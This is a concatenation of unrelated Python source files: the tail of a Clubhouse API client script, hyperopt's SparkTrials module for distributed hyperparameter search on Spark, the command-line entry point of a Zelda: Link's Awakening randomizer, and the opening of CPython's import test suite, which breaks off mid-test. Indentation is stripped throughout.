user_device = client.HEADERS.get("CH-DeviceId")
write_config(user_id, user_token, user_device)
print("[.] Writing configuration file complete.")
if result['is_waitlisted']:
print("[!] You're still on the waitlist. Find your friends to get yourself in.")
return
# Authenticate user first and start doing something
client = Clubhouse(
user_id=user_id,
user_token=user_token,
user_device=user_device
)
if result['is_onboarding']:
process_onboarding(client)
return
def main():
"""
Initialize required configurations, start with some basic stuff.
"""
# Initialize configuration
client = None
user_config = read_config()
user_id = user_config.get('user_id')
user_token = user_config.get('user_token')
user_device = user_config.get('user_device')
# Check if user is authenticated
if user_id and user_token and user_device:
client = Clubhouse(
user_id=user_id,
user_token=user_token,
user_device=user_device
)
# Check if user is still on the waitlist
_check = client.check_waitlist_status()
if _check['is_waitlisted']:
print("[!] You're still on the waitlist. Find your friends to get yourself in.")
return
# Check if user has not signed up yet.
_check = client.me()
if not _check['user_profile'].get("username"):
process_onboarding(client)
chat_main(client)
else:
client = Clubhouse()
user_authentication(client)
main()
if __name__ == "__main__":
try:
main()
except Exception:
# Remove dump files on exit.
file_list = os.listdir(".")
for _file in file_list:
if _file.endswith(".dmp"):
os.remove(_file)
|
spark.py
|
import copy
import threading
import time
import timeit
import traceback
from hyperopt import base, fmin, Trials
from hyperopt.base import validate_timeout, validate_loss_threshold
from hyperopt.utils import coarse_utcnow, _get_logger, _get_random_id
from py4j.clientserver import ClientServer
try:
from pyspark.sql import SparkSession
from pyspark.util import VersionUtils
import pyspark
_have_spark = True
_spark_major_minor_version = VersionUtils.majorMinorVersion(pyspark.__version__)
except ImportError as e:
_have_spark = False
_spark_major_minor_version = None
logger = _get_logger("hyperopt-spark")
class SparkTrials(Trials):
"""
Implementation of hyperopt.Trials supporting
distributed execution using Apache Spark clusters.
This requires fmin to be run on a Spark cluster.
Plugging SparkTrials into hyperopt.fmin() allows hyperopt
to send model training and evaluation tasks to Spark workers,
parallelizing hyperparameter search.
Each trial (set of hyperparameter values) is handled within
a single Spark task; i.e., each model will be fit and evaluated
on a single worker machine. Trials are run asynchronously.
See hyperopt.Trials docs for general information about Trials.
The fields we store in our trial docs match the base Trials class. The fields include:
- 'tid': trial ID
- 'state': JOB_STATE_DONE, JOB_STATE_ERROR, etc.
- 'result': evaluation result for completed trial run
- 'refresh_time': timestamp for last status update
- 'misc': includes:
- 'error': (error type, error message)
- 'book_time': timestamp for trial run start
"""
asynchronous = True
# Hard cap on the number of concurrent hyperopt tasks (Spark jobs) to run. Set at 128.
MAX_CONCURRENT_JOBS_ALLOWED = 128
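# Typical usage (a sketch; `objective` and the search space below are
# assumptions, not part of this module):
#
#   from hyperopt import fmin, tpe, hp
#   trials = SparkTrials(parallelism=4, timeout=3600)
#   best = fmin(fn=objective, space=hp.uniform("x", -10, 10),
#               algo=tpe.suggest, max_evals=100, trials=trials)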
def __init__(
self, parallelism=None, timeout=None, loss_threshold=None, spark_session=None
):
"""
:param parallelism: Maximum number of parallel trials to run,
i.e., maximum number of concurrent Spark tasks.
The actual parallelism is subject to available Spark task slots at
runtime.
If set to None (default) or a non-positive value, this will be set to
Spark's default parallelism or `1`.
We cap the value at `MAX_CONCURRENT_JOBS_ALLOWED=128`.
:param timeout: Maximum time (in seconds) which fmin is allowed to take.
If this timeout is hit, then fmin will cancel running and proposed trials.
It will retain all completed trial runs and return the best result found
so far.
:param spark_session: A SparkSession object. If None is passed, SparkTrials will attempt
to use an existing SparkSession or create a new one. SparkSession is
the entry point for various facilities provided by Spark. For more
information, visit the documentation for PySpark.
"""
super().__init__(exp_key=None, refresh=False)
if not _have_spark:
raise Exception(
"SparkTrials cannot import pyspark classes. Make sure that PySpark "
"is available in your environment. E.g., try running 'import pyspark'"
)
validate_timeout(timeout)
validate_loss_threshold(loss_threshold)
self._spark = (
SparkSession.builder.getOrCreate()
if spark_session is None
else spark_session
)
self._spark_context = self._spark.sparkContext
self._spark_pinned_threads_enabled = isinstance(
self._spark_context._gateway, ClientServer
)
# The feature to support controlling jobGroupIds is in SPARK-22340
self._spark_supports_job_cancelling = (
self._spark_pinned_threads_enabled
or hasattr(self._spark_context.parallelize([1]), "collectWithJobGroup")
)
spark_default_parallelism = self._spark_context.defaultParallelism
self.parallelism = self._decide_parallelism(
requested_parallelism=parallelism,
spark_default_parallelism=spark_default_parallelism,
)
if not self._spark_supports_job_cancelling and timeout is not None:
logger.warning(
"SparkTrials was constructed with a timeout specified, but this Apache "
"Spark version does not support job group-based cancellation. The "
"timeout will be respected when starting new Spark jobs, but "
"SparkTrials will not be able to cancel running Spark jobs which exceed"
" the timeout."
)
self.timeout = timeout
self.loss_threshold = loss_threshold
self._fmin_cancelled = False
self._fmin_cancelled_reason = None
self.refresh()
@staticmethod
def _decide_parallelism(requested_parallelism, spark_default_parallelism):
"""
Given the requested parallelism, return the max parallelism SparkTrials will actually use.
See the docstring for `parallelism` in the constructor for expected behavior.
"""
if requested_parallelism is None or requested_parallelism <= 0:
parallelism = max(spark_default_parallelism, 1)
logger.warning(
"Because the requested parallelism was None or a non-positive value, "
"parallelism will be set to ({d}), which is Spark's default parallelism ({s}), "
"or 1, whichever is greater. "
"We recommend setting parallelism explicitly to a positive value because "
"the total of Spark task slots is subject to cluster sizing.".format(
d=parallelism, s=spark_default_parallelism
)
)
else:
parallelism = requested_parallelism
if parallelism > SparkTrials.MAX_CONCURRENT_JOBS_ALLOWED:
logger.warning(
"Parallelism ({p}) is capped at SparkTrials.MAX_CONCURRENT_JOBS_ALLOWED ({c}).".format(
p=parallelism, c=SparkTrials.MAX_CONCURRENT_JOBS_ALLOWED
)
)
parallelism = SparkTrials.MAX_CONCURRENT_JOBS_ALLOWED
return parallelism
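# For example: _decide_parallelism(None, 8) -> 8 (Spark's default),
# _decide_parallelism(4, 8) -> 4, and _decide_parallelism(500, 8) -> 128
# (capped at MAX_CONCURRENT_JOBS_ALLOWED).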
def count_successful_trials(self):
"""
Returns the current number of trials which ran successfully
"""
return self.count_by_state_unsynced(base.JOB_STATE_DONE)
def count_failed_trials(self):
"""
Returns the current number of trial runs which failed
"""
return self.count_by_state_unsynced(base.JOB_STATE_ERROR)
def count_cancelled_trials(self):
"""
Returns the current number of cancelled trial runs.
This covers trials which are cancelled from exceeding the timeout.
"""
return self.count_by_state_unsynced(base.JOB_STATE_CANCEL)
def count_total_trials(self):
"""
Returns the current number of all successful, failed, and cancelled trial runs
"""
total_states = [
base.JOB_STATE_DONE,
base.JOB_STATE_ERROR,
base.JOB_STATE_CANCEL,
]
return self.count_by_state_unsynced(total_states)
def delete_all(self):
"""
Reset the Trials to init state
"""
super().delete_all()
self._fmin_cancelled = False
self._fmin_cancelled_reason = None
def trial_attachments(self, trial):
raise NotImplementedError("SparkTrials does not support trial attachments.")
def fmin(
self,
fn,
space,
algo,
max_evals,
timeout,
loss_threshold,
max_queue_len,
rstate,
verbose,
pass_expr_memo_ctrl,
catch_eval_exceptions,
return_argmin,
show_progressbar,
early_stop_fn,
trials_save_file="",
):
"""
This should not be called directly but is called via :func:`hyperopt.fmin`
Refer to :func:`hyperopt.fmin` for docs on each argument
"""
if timeout is not None:
if self.timeout is not None:
logger.warning(
"Timeout param was defined in Trials object, ignoring fmin definition"
)
else:
validate_timeout(timeout)
self.timeout = timeout
if loss_threshold is not None:
validate_loss_threshold(loss_threshold)
self.loss_threshold = loss_threshold
assert (
not pass_expr_memo_ctrl
), "SparkTrials does not support `pass_expr_memo_ctrl`"
assert (
not catch_eval_exceptions
), "SparkTrials does not support `catch_eval_exceptions`"
state = _SparkFMinState(self._spark, fn, space, self)
# Will launch a dispatcher thread which runs each trial task as one spark job.
state.launch_dispatcher()
try:
res = fmin(
fn,
space,
algo,
max_evals,
timeout=timeout,
loss_threshold=loss_threshold,
max_queue_len=max_queue_len,
trials=self,
allow_trials_fmin=False, # -- prevent recursion
rstate=rstate,
pass_expr_memo_ctrl=None, # not supported
catch_eval_exceptions=catch_eval_exceptions,
verbose=verbose,
return_argmin=return_argmin,
points_to_evaluate=None, # not supported
show_progressbar=show_progressbar,
early_stop_fn=early_stop_fn,
trials_save_file="", # not supported
)
except BaseException as e:
logger.debug("fmin thread exits with an exception raised.")
raise e
else:
logger.debug("fmin thread exits normally.")
return res
finally:
state.wait_for_all_threads()
logger.info(
"Total Trials: {t}: {s} succeeded, {f} failed, {c} cancelled.".format(
t=self.count_total_trials(),
s=self.count_successful_trials(),
f=self.count_failed_trials(),
c=self.count_cancelled_trials(),
)
)
class _SparkFMinState:
"""
Class for managing threads which run concurrent Spark jobs.
This maintains a primary dispatcher thread, plus 1 thread per Hyperopt trial.
Each trial's thread runs 1 Spark job with 1 task.
"""
def __init__(self, spark, eval_function, space, trials):
self.spark = spark
self.eval_function = eval_function
self.space = space
self.trials = trials
self._fmin_done = False
self._dispatcher_thread = None
self._task_threads = set()
if self.trials._spark_supports_job_cancelling:
spark_context = spark.sparkContext
self._job_group_id = spark_context.getLocalProperty("spark.jobGroup.id")
self._job_desc = spark_context.getLocalProperty("spark.job.description")
interrupt_on_cancel = spark_context.getLocalProperty(
"spark.job.interruptOnCancel"
)
if interrupt_on_cancel is None:
self._job_interrupt_on_cancel = False
else:
self._job_interrupt_on_cancel = "true" == interrupt_on_cancel.lower()
# In certain Spark deployments, the local property "spark.jobGroup.id"
# value is None, so we create one to use for SparkTrials.
if self._job_group_id is None:
self._job_group_id = "Hyperopt_SparkTrials_" + _get_random_id()
if self._job_desc is None:
self._job_desc = "Trial evaluation jobs launched by hyperopt fmin"
logger.debug(
"Job group id: {g}, job desc: {d}, job interrupt on cancel: {i}".format(
g=self._job_group_id,
d=self._job_desc,
i=self._job_interrupt_on_cancel,
)
)
def running_trial_count(self):
return self.trials.count_by_state_unsynced(base.JOB_STATE_RUNNING)
@staticmethod
def _begin_trial_run(trial):
trial["state"] = base.JOB_STATE_RUNNING
now = coarse_utcnow()
trial["book_time"] = now
trial["refresh_time"] = now
logger.debug("trial task {tid} started".format(tid=trial["tid"]))
@staticmethod
def _get_traceback(err):
return err.__dict__.get("_tb_str")
def _finish_trial_run(self, is_success, is_cancelled, trial, data):
"""
Call this method when a trial evaluation finishes. It will save results to the
trial object and update task counters.
:param is_success: whether the trial succeeded
:param is_cancelled: whether the trial was cancelled
:param data: If the trial succeeded, this is the return value from the trial
task function. Otherwise, this is the exception raised when running the trial
task.
"""
if is_cancelled:
logger.debug(
"trial task {tid} cancelled, exception is {e}".format(
tid=trial["tid"], e=str(data)
)
)
self._write_cancellation_back(trial, e=data)
elif is_success:
logger.debug(
"trial task {tid} succeeded, result is {r}".format(
tid=trial["tid"], r=data
)
)
self._write_result_back(trial, result=data)
else:
logger.error(
"trial task {tid} failed, exception is {e}.\n {tb}".format(
tid=trial["tid"], e=str(data), tb=self._get_traceback(data)
)
)
self._write_exception_back(trial, e=data)
def launch_dispatcher(self):
def run_dispatcher():
start_time = timeit.default_timer()
while not self._fmin_done:
new_tasks = self._poll_new_tasks()
for trial in new_tasks:
self._run_trial_async(trial)
cur_time = timeit.default_timer()
elapsed_time = cur_time - start_time
# In the future, timeout checking logic could be moved to `fmin`.
# For now, timeouts are specific to SparkTrials.
# When a timeout happens:
# - Set `trials._fmin_cancelled` flag to be True.
# - FMinIter checks this flag and exits if it is set to True.
if (
self.trials.timeout is not None
and elapsed_time > self.trials.timeout
and not self.trials._fmin_cancelled
):
self.trials._fmin_cancelled = True
self.trials._fmin_cancelled_reason = "fmin run timeout"
self._cancel_running_trials()
logger.warning(
"fmin cancelled because of "
+ self.trials._fmin_cancelled_reason
)
time.sleep(1)
if self.trials._fmin_cancelled:
# Because cancelling fmin triggered, warn that the dispatcher won't launch
# more trial tasks.
logger.warning("fmin is cancelled, so new trials will not be launched.")
logger.debug("dispatcher thread exits normally.")
self._dispatcher_thread = threading.Thread(target=run_dispatcher)
self._dispatcher_thread.daemon = True
self._dispatcher_thread.start()
@staticmethod
def _get_spec_from_trial(trial):
return base.spec_from_misc(trial["misc"])
@staticmethod
def _write_result_back(trial, result):
trial["state"] = base.JOB_STATE_DONE
trial["result"] = result
trial["refresh_time"] = coarse_utcnow()
def _write_exception_back(self, trial, e):
trial["state"] = base.JOB_STATE_ERROR
trial["misc"]["error"] = (str(type(e)), self._get_traceback(e))
trial["refresh_time"] = coarse_utcnow()
@staticmethod
def _write_cancellation_back(trial, e):
trial["state"] = base.JOB_STATE_CANCEL
trial["misc"]["error"] = (str(type(e)), str(e))
trial["refresh_time"] = coarse_utcnow()
def _run_trial_async(self, trial):
def finish_trial_run(result_or_e):
if not isinstance(result_or_e, BaseException):
self._finish_trial_run(
is_success=True,
is_cancelled=self.trials._fmin_cancelled,
trial=trial,
data=result_or_e,
)
logger.debug(
"trial {tid} task thread exits normally and writes results "
"back correctly.".format(tid=trial["tid"])
)
else:
self._finish_trial_run(
is_success=False,
is_cancelled=self.trials._fmin_cancelled,
trial=trial,
data=result_or_e,
)
logger.debug(
"trial {tid} task thread catches an exception and writes the "
"info back correctly.".format(tid=trial["tid"])
)
def run_task_thread():
local_eval_function, local_space = self.eval_function, self.space
params = self._get_spec_from_trial(trial)
def run_task_on_executor(_):
domain = base.Domain(
local_eval_function, local_space, pass_expr_memo_ctrl=None
)
try:
result = domain.evaluate(
params, ctrl=None, attach_attachments=False
)
yield result
except BaseException as e:
# Because the traceback is not picklable, we format it and pass it back
# to the driver
_traceback_string = traceback.format_exc()
logger.error(_traceback_string)
e._tb_str = _traceback_string
yield e
try:
worker_rdd = self.spark.sparkContext.parallelize([0], 1)
if self.trials._spark_supports_job_cancelling:
if self.trials._spark_pinned_threads_enabled:
spark_context = self.spark.sparkContext
spark_context.setLocalProperty(
"spark.jobGroup.id", self._job_group_id
)
spark_context.setLocalProperty(
"spark.job.description", self._job_desc
)
spark_context.setLocalProperty(
"spark.job.interruptOnCancel",
str(self._job_interrupt_on_cancel).lower(),
)
result_or_e = worker_rdd.mapPartitions(
run_task_on_executor
).collect()[0]
else:
result_or_e = worker_rdd.mapPartitions(
run_task_on_executor
).collectWithJobGroup(
self._job_group_id,
self._job_desc,
self._job_interrupt_on_cancel,
)[
0
]
else:
result_or_e = worker_rdd.mapPartitions(
run_task_on_executor
).collect()[0]
except BaseException as e:
# Catch all exceptions here to make the program more robust: there are
# several possible reasons an exception can be raised at this point,
# which is why `except BaseException` is used.
#
# If the cancelled flag is set, all running tasks need to be cancelled;
# otherwise, the exception means the task itself failed.
finish_trial_run(e)
else:
# The exceptions captured in run_task_on_executor would be returned in the result_or_e
finish_trial_run(result_or_e)
if self.trials._spark_pinned_threads_enabled:
try:
# pylint: disable=no-name-in-module,import-outside-toplevel
from pyspark import inheritable_thread_target
run_task_thread = inheritable_thread_target(run_task_thread)
except ImportError:
pass
task_thread = threading.Thread(target=run_task_thread)
task_thread.daemon = True
task_thread.start()
self._task_threads.add(task_thread)
def _poll_new_tasks(self):
new_task_list = []
for trial in copy.copy(self.trials.trials):
if trial["state"] == base.JOB_STATE_NEW:
# check parallelism limit
if self.running_trial_count() >= self.trials.parallelism:
break
new_task_list.append(trial)
self._begin_trial_run(trial)
return new_task_list
def _cancel_running_trials(self):
if self.trials._spark_supports_job_cancelling:
logger.debug(
"Cancelling all running jobs in job group {g}".format(
g=self._job_group_id
)
)
self.spark.sparkContext.cancelJobGroup(self._job_group_id)
# Make a copy of trials by slicing
for trial in self.trials.trials[:]:
if trial["state"] in [base.JOB_STATE_NEW, base.JOB_STATE_RUNNING]:
trial["state"] = base.JOB_STATE_CANCEL
else:
logger.info(
"Because the current Apache PySpark version does not support "
"cancelling jobs by job group ID, SparkTrials will block until all of "
"its running Spark jobs finish."
)
def wait_for_all_threads(self):
"""
Wait for the dispatcher and worker threads to finish.
"""
self._fmin_done = True
self._dispatcher_thread.join()
self._dispatcher_thread = None
for task_thread in self._task_threads:
task_thread.join()
self._task_threads.clear()
|
main.py
|
import binascii
from romTables import ROMWithTables
import shlex
import randomizer
import logic
import spoilerLog
import re
from argparse import ArgumentParser, ArgumentTypeError
def goal(goal):
if goal == "random":
goal = "-1-8"
elif goal in ["seashells", "raft", "bingo", "bingo-full"]:
return goal
m = re.match(r'^(-?\d|open)(?:-(\d))?$', goal)
if not m:
raise ArgumentTypeError("'" + goal + "' is not valid: expected a number (open, 0, 1, 2 ... 8), a range (open-6, 1-4, 5-8, ...) or 'seashells' / 'raft'.")
start = m.group(1)
if start == "open":
start = "-1"
start = int(start)
end = m.group(2) or start
end = int(end)
if start < -1 or start > 8 or end < -1 or end > 8:
raise ArgumentTypeError("'" + goal + "' is not valid: expected a number (-1, 0, 1, 2 ... 8), a range (1-4, 5-8, ...) or 'seashells' / 'raft'.")
if end == start:
return start
elif end < start:
raise ArgumentTypeError("'" + goal + "' is not valid: expected a number (-1, 0, 1, 2 ... 8), a range (1-4, 5-8, ...) or 'seashells' / 'raft'.")
return range(start, end+1)
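# Examples: goal("4") -> 4, goal("1-4") -> range(1, 5), goal("open") -> -1,
# goal("random") -> range(-1, 9), and goal("raft") -> "raft".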
# Check if the current mix of options is valid, and fix incompatible selected options
def validateOptions(options):
def req(setting, value, message):
if getattr(options, setting) != value:
print("Warning: %s (setting adjusted automatically)" % message)
setattr(options, setting, value)
def dis(setting, value, new_value, message):
if getattr(options, setting) == value:
print("Warning: %s (setting adjusted automatically)" % message)
setattr(options, setting, new_value)
if options.goal in ("bingo", "bingo-full"):
req("overworld", "normal", "Bingo goal does not work with dungeondive")
req("accessibility_rule", "all", "Bingo goal needs 'all' accessibility")
dis("steal", "never", "default", "With bingo goal, stealing should be allowed")
dis("boss", "random", "shuffle", "With bingo goal, bosses need to be on normal or shuffle")
dis("miniboss", "random", "shuffle", "With bingo goal, minibosses need to be on normal or shuffle")
if options.overworld == "dungeondive":
dis("goal", "seashells", "8", "Dungeon dive does not work with seashell goal")
def main(mainargs=None):
import argparse
import sys
parser = argparse.ArgumentParser(description='Randomize!')
parser.add_argument('input_filename', metavar='input rom', type=str,
help="Rom file to use as input.")
parser.add_argument('-o', '--output', dest="output_filename", metavar='output rom', type=str, required=False,
help="Output filename to use. If not specified [seed].gbc is used.")
parser.add_argument('--dump', dest="dump", type=str, nargs="*",
help="Dump the logic of the given rom (spoilers!)")
parser.add_argument('--spoilerformat', dest="spoilerformat", choices=["none", "console", "text", "json"], default="none",
help="Sets the output format for the generated seed's spoiler log")
parser.add_argument('--spoilerfilename', dest="spoiler_filename", type=str, required=False,
help="Output filename to use for the spoiler log. If not specified, LADXR_[seed].txt/json is used.")
parser.add_argument('--test', dest="test", action="store_true",
help="Test the logic of the given rom, without showing anything.")
parser.add_argument('-s', '--seed', dest="seed", type=str, required=False,
help="Generate the specified seed")
parser.add_argument('--romdebugmode', dest="romdebugmode", action="store_true",
help="Patch the rom so that debug mode is enabled, this creates a default save with most items and unlocks some debug features.")
parser.add_argument('--exportmap', dest="exportmap", action="store_true",
help="Export the map (many graphical mistakes)")
parser.add_argument('--emptyplan', dest="emptyplan", type=str, required=False,
help="Write an unfilled plan file")
parser.add_argument('--timeout', type=float, required=False,
help="Timeout generating the seed after the specified number of seconds")
parser.add_argument('--logdirectory', dest="log_directory", type=str, required=False,
help="Directory to write the JSON log file. Generated independently from the spoiler log and omitted by default.")
    # Flags that affect gameplay
parser.add_argument('--plan', dest="plan", metavar='plandomizer', type=str, required=False,
help="Read an item placement plan")
parser.add_argument('--race', dest="race", nargs="?", default=False, const=True,
help="Enable race mode. This generates a rom from which the spoiler log cannot be dumped and the seed cannot be extracted.")
parser.add_argument('--logic', dest="logic", choices=["casual", "normal", "hard", "glitched", "hell"],
help="Which level of logic is required.")
parser.add_argument('--multiworld', dest="multiworld", type=int, required=False,
help="Generates multiple roms for a multiworld setup.")
parser.add_argument('--multiworld-config', dest="multiworld_config", action="append", required=False,
help="Set configuration for a multiworld player, supply multiple times for settings per player")
parser.add_argument('--forwardfactor', dest="forwardfactor", type=float, required=False,
help="Forward item weight adjustment factor, lower values generate more rear heavy seeds while higher values generate front heavy seeds. Default is 0.5.")
parser.add_argument('--heartpiece', dest="heartpiece", action="store_true",
help="Enables randomization of heart pieces.")
parser.add_argument('--seashells', dest="seashells", action="store_true",
help="Enables seashells mode, which randomizes the secret sea shells hiding in the ground/trees. (chest are always randomized)")
parser.add_argument('--heartcontainers', dest="heartcontainers", action="store_true",
help="Enables heartcontainer mode, which randomizes the heart containers dropped by bosses.")
parser.add_argument('--instruments', dest="instruments", action="store_true",
help="Shuffle the instruments in the item pool.")
parser.add_argument('--owlstatues', dest="owlstatues", choices=['none', 'dungeon', 'overworld', 'both'], default='none',
help="Give the owl statues in dungeons or on the overworld items as well, instead of showing the normal hints")
parser.add_argument('--dungeon-items', dest="dungeon_items", choices=['standard', 'localkeys', 'localnightmarekey', 'smallkeys', 'keysanity', 'keysy'], default='standard',
help="Sets what gets done with dungeon items, if they are in their own dungeon or not.")
parser.add_argument('--randomstartlocation', dest="randomstartlocation", action="store_true",
help="Place your starting house at a random location.")
parser.add_argument('--dungeonshuffle', dest="dungeonshuffle", action="store_true",
help="Enable dungeon shuffle, puts dungeons on different spots.")
parser.add_argument('--entranceshuffle', dest="entranceshuffle", choices=["none", "simple", "advanced", "expert", "insanity"], default="none",
help="Enable entrance shuffle, shuffles around overworld entrances.")
parser.add_argument('--boss', dest="boss", choices=["default", "shuffle", "random"], default="default",
help="Enable boss shuffle, swaps around dungeon bosses.")
parser.add_argument('--miniboss', dest="miniboss", choices=["default", "shuffle", "random"], default="default",
help="Shuffle the minibosses or just randomize them.")
parser.add_argument('--doubletrouble', dest="doubletrouble", action="store_true",
help="Warning, bugged in various ways")
parser.add_argument('--witch', dest="witch", action="store_true",
help="Enables witch and toadstool in the item pool.")
parser.add_argument('--rooster', dest="rooster", action="store_true",
help="Adds rooster to the item pool.")
parser.add_argument('--hpmode', dest="hpmode", choices=['default', 'inverted', '1', 'low', 'extralow'], default='default',
help="Set the HP gamplay mode. Inverted causes health containers to take HP instead of give it and you start with more health. 1 sets your starting health to just 1 hearth.")
parser.add_argument('--boomerang', dest="boomerang", choices=['default', 'trade', 'gift'], default='default',
help="Put the boomerang and the trade with the boomerang in the item pool")
parser.add_argument('--steal', dest="steal", choices=['never', 'always', 'default'], default='always',
help="Configure when to allow stealing from the shop.")
parser.add_argument('--hard-mode', dest="hardMode", choices=["none", "oracle", "hero", "ohko"], default="none",
help="Make the game a bit harder. [oracle] less health from drops, bombs damage yourself, and less iframes. [hero] Double damage, no heart/fairy drops. [ohko] One hit KO.")
parser.add_argument('--superweapons', dest="superweapons", action="store_true",
help="Make all weapons/inventory more powerful.")
parser.add_argument('--goal', dest="goal", type=goal, default='8',
help="Configure the instrument goal for this rom: any number between -1 (open egg) and 8, a range (e.g. 4-7), 'random', or 'raft' / 'seashells' / 'bingo' for special goals.")
parser.add_argument('--accessibility', dest="accessibility_rule", choices=['all', 'goal'],
help="Switches between making sure all locations are reachable or only the goal is reachable")
parser.add_argument('--bowwow', dest="bowwow", choices=['normal', 'always', 'swordless'], default='normal',
help="Enables 'good boy mode', where BowWow is allowed on all screens and can damage bosses and more enemies.")
parser.add_argument('--pool', dest="itempool", choices=['normal', 'casual', 'pain', 'keyup'], default='normal',
help="Sets up different item pools, for easier or harder gameplay.")
parser.add_argument('--overworld', dest="overworld", choices=['normal', 'dungeondive'], default='normal',
help="Allows switching to the dungeondive overworld, where there are only dungeons.")
parser.add_argument('--pymod', dest="pymod", action='append',
help="Load python code mods.")
    # Purely aesthetic flags
parser.add_argument('--gfxmod', dest="gfxmod", action='append',
help="Load graphical mods.")
parser.add_argument('--remove-flashing-lights', dest="removeFlashingLights", action="store_true",
help="Remove the flashing light effects from mamu, the shopkeeper and madbatter.")
parser.add_argument('--quickswap', dest="quickswap", choices=['none', 'a', 'b'], default='none',
help="Configure quickswap for A or B button (select key swaps, no longer opens map)")
parser.add_argument('--textmode', dest="textmode", choices=['default', 'fast', 'none'], default='default',
help="Default just keeps text normal, fast makes text appear twice as fast, and none removes all text from the game.")
parser.add_argument('--nag-messages', dest="removeNagMessages", action="store_false",
help="Enable the nag messages on touching stones and crystals. By default they are removed.")
parser.add_argument('--lowhpbeep', dest="lowhpbeep", choices=['default', 'slow', 'none'], default='slow',
help="Slows or disables the low health beeping sound")
parser.add_argument('--linkspalette', dest="linkspalette", type=int, default=None,
help="Force the palette of link")
parser.add_argument('--music', dest="music", choices=['default', 'random', 'off'], default='default',
help="Randomizes or disable the music")
args = parser.parse_args(mainargs)
validateOptions(args)
if args.multiworld is not None:
args.multiworld_options = [args] * args.multiworld
if args.multiworld_config is not None:
for index, settings_string in enumerate(args.multiworld_config):
args.multiworld_options[index] = parser.parse_args([args.input_filename] + shlex.split(settings_string),
namespace=argparse.Namespace(**vars(args)))
validateOptions(args.multiworld_options[index])
if args.timeout is not None:
import threading
import time
import os
def timeoutFunction():
time.sleep(args.timeout)
print("TIMEOUT")
sys.stdout.flush()
os._exit(1)
threading.Thread(target=timeoutFunction, daemon=True).start()
if args.exportmap:
import mapexport
print("Loading: %s" % (args.input_filename))
rom = ROMWithTables(args.input_filename)
mapexport.MapExport(rom)
sys.exit(0)
if args.emptyplan:
import locations.items
f = open(args.emptyplan, "wt")
f.write(";Plandomizer data\n;Items: %s\n" % (", ".join(map(lambda n: getattr(locations.items, n), filter(lambda n: not n.startswith("__"), dir(locations.items))))))
f.write(";Modify the item pool:\n")
f.write(";Pool:SWORD:+5\n")
f.write(";Pool:RUPEES_50:-5\n")
import worldSetup
iteminfo_list = logic.Logic(args, world_setup=worldSetup.WorldSetup()).iteminfo_list
for ii in sorted(iteminfo_list, key=lambda n: (n.location.dungeon if n.location.dungeon else -1, repr(n.metadata))):
if len(ii.OPTIONS) > 1:
f.write(";%r\n" % (ii.metadata))
f.write("Location:%s: \n" % (ii.nameId))
sys.exit(0)
if args.dump is not None or args.test:
print("Loading: %s" % (args.input_filename))
        roms = [ROMWithTables(f) for f in [args.input_filename] + (args.dump or [])]
if args.spoilerformat == "none":
args.spoilerformat = "console"
try:
log = spoilerLog.SpoilerLog(args, roms)
log.output(args.spoiler_filename)
sys.exit(0)
except spoilerLog.RaceRomException:
print("Cannot read spoiler log for race rom")
sys.exit(1)
if args.seed:
try:
args.seed = binascii.unhexlify(args.seed)
except binascii.Error:
args.seed = args.seed.encode("ascii")
retry_count = 0
while True:
try:
r = randomizer.Randomizer(args, seed=args.seed)
seed = binascii.hexlify(r.seed).decode("ascii").upper()
break
except randomizer.Error:
if args.seed is not None:
print("Specified seed does not produce a valid result.")
sys.exit(1)
retry_count += 1
if retry_count > 100:
print("Randomization keeps failing, abort!")
sys.exit(1)
print("Failed, trying again: %d" % (retry_count))
print("Seed: %s" % (seed))
if __name__ == "__main__":
main()
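# Example invocations (hypothetical file names, shown only for illustration):
#   python main.py input.gbc -o output.gbc --seed DEADBEEF
#   python main.py input.gbc --goal 1-4 --logic hard --spoilerformat text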
|
__init__.py
|
import builtins
import contextlib
import errno
import glob
import importlib.util
from importlib._bootstrap_external import _get_sourcefile
import marshal
import os
import py_compile
import random
import shutil
import stat
import subprocess
import sys
import textwrap
import threading
import time
import unittest
from unittest import mock
from test.support import os_helper
from test.support import (is_jython, swap_attr, swap_item, cpython_only)
from test.support.import_helper import (
forget, make_legacy_pyc, unlink, unload, DirsOnSysPath)
from test.support.os_helper import (
TESTFN, rmtree, temp_umask, TESTFN_UNENCODABLE, temp_dir)
from test.support import script_helper
from test.support import threading_helper
from test.test_importlib.util import uncache
from types import ModuleType
skip_if_dont_write_bytecode = unittest.skipIf(
sys.dont_write_bytecode,
"test meaningful only when writing bytecode")
def remove_files(name):
for f in (name + ".py",
name + ".pyc",
name + ".pyw",
name + "$py.class"):
unlink(f)
rmtree('__pycache__')
@contextlib.contextmanager
def _ready_to_import(name=None, source=""):
# sets up a temporary directory and removes it
# creates the module file
# temporarily clears the module from sys.modules (if any)
# reverts or removes the module when cleaning up
name = name or "spam"
with temp_dir() as tempdir:
path = script_helper.make_script(tempdir, name, source)
old_module = sys.modules.pop(name, None)
try:
sys.path.insert(0, tempdir)
yield name, path
sys.path.remove(tempdir)
finally:
if old_module is not None:
sys.modules[name] = old_module
elif name in sys.modules:
del sys.modules[name]
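# Hedged usage sketch (not part of the test suite): _ready_to_import yields a
# module name and its path inside a temporary directory already on sys.path,
# so the module can be written, imported, and cleaned up afterwards.
def _ready_to_import_demo():
    with _ready_to_import("demo_mod", "answer = 42") as (name, path):
        assert path.endswith(".py")
        mod = __import__(name)
        assert mod.answer == 42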
class ImportTests(unittest.TestCase):
def setUp(self):
remove_files(TESTFN)
importlib.invalidate_caches()
def tearDown(self):
unload(TESTFN)
def test_import_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
import something_that_should_not_exist_anywhere
def test_from_import_missing_module_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
from something_that_should_not_exist_anywhere import blah
def test_from_import_missing_attr_raises_ImportError(self):
with self.assertRaises(ImportError):
from importlib import something_that_should_not_exist_anywhere
def test_from_import_missing_attr_has_name_and_path(self):
with self.assertRaises(ImportError) as cm:
from os import i_dont_exist
self.assertEqual(cm.exception.name, 'os')
self.assertEqual(cm.exception.path, os.__file__)
self.assertRegex(str(cm.exception), r"cannot import name 'i_dont_exist' from 'os' \(.*os.py\)")
@cpython_only
def test_from_import_missing_attr_has_name_and_so_path(self):
import _testcapi
with self.assertRaises(ImportError) as cm:
from _testcapi import i_dont_exist
self.assertEqual(cm.exception.name, '_testcapi')
self.assertEqual(cm.exception.path, _testcapi.__file__)
self.assertRegex(str(cm.exception), r"cannot import name 'i_dont_exist' from '_testcapi' \(.*\.(so|pyd)\)")
def test_from_import_missing_attr_has_name(self):
with self.assertRaises(ImportError) as cm:
# _warning has no path as it's a built-in module.
